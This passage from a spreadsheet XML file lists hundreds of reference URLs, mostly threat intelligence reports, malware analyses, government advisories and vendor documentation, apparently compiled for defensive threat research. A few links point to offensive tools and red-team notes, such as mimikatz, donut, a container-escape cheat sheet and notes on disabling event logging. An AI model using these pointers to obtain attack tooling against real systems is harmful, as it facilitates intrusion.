    <t>https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html</t>
  </si>
  <si>
    <t>https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html</t>
  </si>
  <si>
    <t>https://0xn3va.gitbook.io/cheat-sheets/container/escaping</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/container-registry/container-registry-content-trust</t>
  </si>
  <si>
    <t>https://docs.docker.com/engine/security/trust/content_trust/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8</t>
  </si>
  <si>
    <t>https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf</t>
  </si>
  <si>
    <t>https://www.coresecurity.com/corelabs-research/open-source-tools/impacket</t>
  </si>
  <si>
    <t>https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html</t>
  </si>
  <si>
    <t>http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx</t>
  </si>
  <si>
    <t>https://twitter.com/craiu/status/1311920398259367942</t>
  </si>
  <si>
    <t>https://www.countercept.com/blog/detecting-parent-pid-spoofing/</t>
  </si>
  <si>
    <t>https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/</t>
  </si>
  <si>
    <t>http://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/who-is-ember-bear/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/</t>
  </si>
  <si>
    <t>https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2019GlobalThreatReport.pdf</t>
  </si>
  <si>
    <t>https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/wp-content/uploads/2022/05/crowdstrike-iceapple-a-novel-internet-information-services-post-exploitation-framework.pdf</t>
  </si>
  <si>
    <t>https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/</t>
  </si>
  <si>
    <t>https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/who-is-pioneer-kitten/</t>
  </si>
  <si>
    <t>http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</t>
  </si>
  <si>
    <t>https://adversary.crowdstrike.com/en-US/adversary/ricochet-chollima/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/</t>
  </si>
  <si>
    <t>https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/wizard-spider-adversary-update/</t>
  </si>
  <si>
    <t>https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/</t>
  </si>
  <si>
    <t>https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf</t>
  </si>
  <si>
    <t>https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/two-birds-one-stone-panda/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/</t>
  </si>
  <si>
    <t>https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/on-demand-webcast-crowdstrike-experts-on-covid-19-cybersecurity-challenges-and-recommendations/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware</t>
  </si>
  <si>
    <t>https://blog.crysys.hu/2013/03/teamspy/</t>
  </si>
  <si>
    <t>https://www.crysys.hu/publications/files/skywiper.pdf</t>
  </si>
  <si>
    <t>https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/</t>
  </si>
  <si>
    <t>https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise</t>
  </si>
  <si>
    <t>https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/</t>
  </si>
  <si>
    <t>https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/</t>
  </si>
  <si>
    <t>https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/</t>
  </si>
  <si>
    <t>http://www.cyberengineeringservices.com/2011/12/15/trojan-gtalk/</t>
  </si>
  <si>
    <t>https://www.cyberscoop.com/apt28-brexit-phishing-accenture/</t>
  </si>
  <si>
    <t>https://www.cyberscoop.com/babuk-ransomware-serco-attack/</t>
  </si>
  <si>
    <t>https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/</t>
  </si>
  <si>
    <t>https://www.cyberscoop.com/fin7-dde-morphisec-fileless-malware/</t>
  </si>
  <si>
    <t>https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps</t>
  </si>
  <si>
    <t>https://bash.cyberciti.biz/guide/Trap_statement</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control</t>
  </si>
  <si>
    <t>https://www.cybereason.com/hubfs/dam/collateral/reports/11-2020-Chaes-e-commerce-malware-research.pdf</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/cybereason-vs.-clop-ransomware</t>
  </si>
  <si>
    <t>https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware</t>
  </si>
  <si>
    <t>http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability</t>
  </si>
  <si>
    <t>https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/medusalocker-ransomware</t>
  </si>
  <si>
    <t>https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/operation-cobalt-kitty-apt</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/research/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/valak-more-than-meets-the-eye</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/cybereason-vs.-whispergate-wiper</t>
  </si>
  <si>
    <t>https://blog.cyberint.com/qakbot-banking-trojan</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom</t>
  </si>
  <si>
    <t>https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF</t>
  </si>
  <si>
    <t>https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf</t>
  </si>
  <si>
    <t>https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/</t>
  </si>
  <si>
    <t>https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/</t>
  </si>
  <si>
    <t>https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/</t>
  </si>
  <si>
    <t>https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf</t>
  </si>
  <si>
    <t>https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf</t>
  </si>
  <si>
    <t>https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html</t>
  </si>
  <si>
    <t>http://blog.cylance.com/puttering-into-the-future</t>
  </si>
  <si>
    <t>https://www.cylance.com/content/dam/cylance/pdfs/white_papers/RedirectToSMB.pdf</t>
  </si>
  <si>
    <t>https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order</t>
  </si>
  <si>
    <t>https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517</t>
  </si>
  <si>
    <t>https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar</t>
  </si>
  <si>
    <t>https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf</t>
  </si>
  <si>
    <t>https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/</t>
  </si>
  <si>
    <t>https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44</t>
  </si>
  <si>
    <t>https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e</t>
  </si>
  <si>
    <t>https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/</t>
  </si>
  <si>
    <t>https://ti.dbappsecurity.com.cn/blog/articles/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/</t>
  </si>
  <si>
    <t>https://www.dcshadow.com/</t>
  </si>
  <si>
    <t>http://man7.org/linux/man-pages/man1/dd.1.html</t>
  </si>
  <si>
    <t>https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2021/12/13/diavol-ransomware/</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/</t>
  </si>
  <si>
    <t>https://thedfirreport.com/2020/10/08/ryuks-return/</t>
  </si>
  <si>
    <t>https://www.cisa.gov/uscert/ncas/alerts/aa22-055a</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/alerts/aa20-302a</t>
  </si>
  <si>
    <t>https://dnsdumpster.com/</t>
  </si>
  <si>
    <t>https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network</t>
  </si>
  <si>
    <t>https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion</t>
  </si>
  <si>
    <t>https://www.justice.gov/opa/press-release/file/1084361/download</t>
  </si>
  <si>
    <t>https://www.justice.gov/file/1080281/download</t>
  </si>
  <si>
    <t>https://www.justice.gov/usao-sdny/press-release/file/1045781/download</t>
  </si>
  <si>
    <t>https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt</t>
  </si>
  <si>
    <t>https://www.justice.gov/opa/press-release/file/1092091/download</t>
  </si>
  <si>
    <t>https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and</t>
  </si>
  <si>
    <t>https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical</t>
  </si>
  <si>
    <t>https://danielmanea.com/category/reverseengineering/</t>
  </si>
  <si>
    <t>https://www.usenix.org/conference/usenix-security-11/dark-clouds-horizon-using-cloud-storage-attack-vector-and-online-slack</t>
  </si>
  <si>
    <t>https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764</t>
  </si>
  <si>
    <t>https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059</t>
  </si>
  <si>
    <t>https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?</t>
  </si>
  <si>
    <t>https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/darkside-ransomware/</t>
  </si>
  <si>
    <t>https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware</t>
  </si>
  <si>
    <t>https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/</t>
  </si>
  <si>
    <t>https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/</t>
  </si>
  <si>
    <t>http://www.pretentiousname.com/misc/win7_uac_whitelist2.html</t>
  </si>
  <si>
    <t>https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8</t>
  </si>
  <si>
    <t>https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html#s-mscriptsinstact</t>
  </si>
  <si>
    <t>https://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html</t>
  </si>
  <si>
    <t>https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/</t>
  </si>
  <si>
    <t>https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805</t>
  </si>
  <si>
    <t>https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation</t>
  </si>
  <si>
    <t>http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/</t>
  </si>
  <si>
    <t>http://www.secureworks.com/cyber-threat-intelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ZeuS/</t>
  </si>
  <si>
    <t>http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/skeleton-key-malware-analysis</t>
  </si>
  <si>
    <t>http://www.secureworks.com/resources/blog/living-off-the-land/</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage</t>
  </si>
  <si>
    <t>http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/wmi-persistence</t>
  </si>
  <si>
    <t>http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/</t>
  </si>
  <si>
    <t>https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc</t>
  </si>
  <si>
    <t>https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials</t>
  </si>
  <si>
    <t>https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html</t>
  </si>
  <si>
    <t>https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js</t>
  </si>
  <si>
    <t>https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/</t>
  </si>
  <si>
    <t>https://github.com/gentilkiwi/mimikatz</t>
  </si>
  <si>
    <t>https://home.treasury.gov/news/press-releases/sm1127</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html</t>
  </si>
  <si>
    <t>https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/</t>
  </si>
  <si>
    <t>https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/</t>
  </si>
  <si>
    <t>https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/</t>
  </si>
  <si>
    <t>https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/</t>
  </si>
  <si>
    <t>https://linux.die.net/man/1/bash</t>
  </si>
  <si>
    <t>https://www.digicert.com/kb/ssl-certificate-installation.htm</t>
  </si>
  <si>
    <t>https://www.digitrustgroup.com/agent-tesla-keylogger/</t>
  </si>
  <si>
    <t>https://www.digitrustgroup.com/nanocore-not-your-average-rat/</t>
  </si>
  <si>
    <t>https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/</t>
  </si>
  <si>
    <t>https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/</t>
  </si>
  <si>
    <t>http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf</t>
  </si>
  <si>
    <t>https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/</t>
  </si>
  <si>
    <t>https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7</t>
  </si>
  <si>
    <t>https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging</t>
  </si>
  <si>
    <t>https://www.justice.gov/opa/page/file/1122671/download</t>
  </si>
  <si>
    <t>https://docs.docker.com/engine/api/v1.41/</t>
  </si>
  <si>
    <t>https://docs.docker.com/storage/bind-mounts/</t>
  </si>
  <si>
    <t>https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild</t>
  </si>
  <si>
    <t>https://docs.docker.com/engine/api/v1.41/#tag/Container</t>
  </si>
  <si>
    <t>https://docs.docker.com/engine/reference/commandline/dockerd/</t>
  </si>
  <si>
    <t>https://docs.docker.com/engine/security/protect-access/</t>
  </si>
  <si>
    <t>https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime</t>
  </si>
  <si>
    <t>https://docs.docker.com/engine/reference/commandline/exec/</t>
  </si>
  <si>
    <t>https://docs.docker.com/engine/reference/commandline/images/</t>
  </si>
  <si>
    <t>https://docs.docker.com/get-started/overview/</t>
  </si>
  <si>
    <t>https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/</t>
  </si>
  <si>
    <t>https://github.com/TheWover/donut</t>
  </si>
  <si>
    <t>https://insights.sei.cmu.edu/cert/2019/09/the-dangers-of-vhd-and-vhdx-files.html</t>
  </si>
  <si>
    <t>https://dragos.com/blog/crashoverride/CrashOverride-01.pdf</t>
  </si>
  <si>
    <t>https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf</t>
  </si>
  <si>
    <t>https://www.dragos.com/threat/dymalloy/</t>
  </si>
  <si>
    <t>https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/</t>
  </si>
  <si>
    <t>https://www.dragos.com/resource/electrum/</t>
  </si>
  <si>
    <t>https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/</t>
  </si>
  <si>
    <t>https://dragos.com/resource/hexane/</t>
  </si>
  <si>
    <t>https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/</t>
  </si>
  <si>
    <t>https://www.dragos.com/threat/parisite/</t>
  </si>
  <si>
    <t>https://www.dragos.com/blog/20180802Raspite.html</t>
  </si>
  <si>
    <t>https://www.dragos.com/threat/talonite/</t>
  </si>
  <si>
    <t>https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770</t>
  </si>
  <si>
    <t>https://www.dragos.com/threat/wassonite/</t>
  </si>
  <si>
    <t>https://dragos.com/resource/xenotime/</t>
  </si>
  <si>
    <t>https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avoiding-PInvoke.html?s=03</t>
  </si>
  <si>
    <t>https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf</t>
  </si>
  <si>
    <t>http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf</t>
  </si>
  <si>
    <t>https://www.techradar.com/news/ea-hack-reportedly-used-stolen-cookies-and-slack-to-hack-gaming-giant</t>
  </si>
  <si>
    <t>https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf</t>
  </si>
  <si>
    <t>https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf</t>
  </si>
  <si>
    <t>https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf</t>
  </si>
  <si>
    <t>https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/</t>
  </si>
  <si>
    <t>https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-launchdaemon/</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html</t>
  </si>
  <si>
    <t>https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows</t>
  </si>
  <si>
    <t>http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine</t>
  </si>
  <si>
    <t>https://www.eset.com/fileadmin/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2018/12/28/analysis-latest-emotet-propagation-campaign/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine</t>
  </si>
  <si>
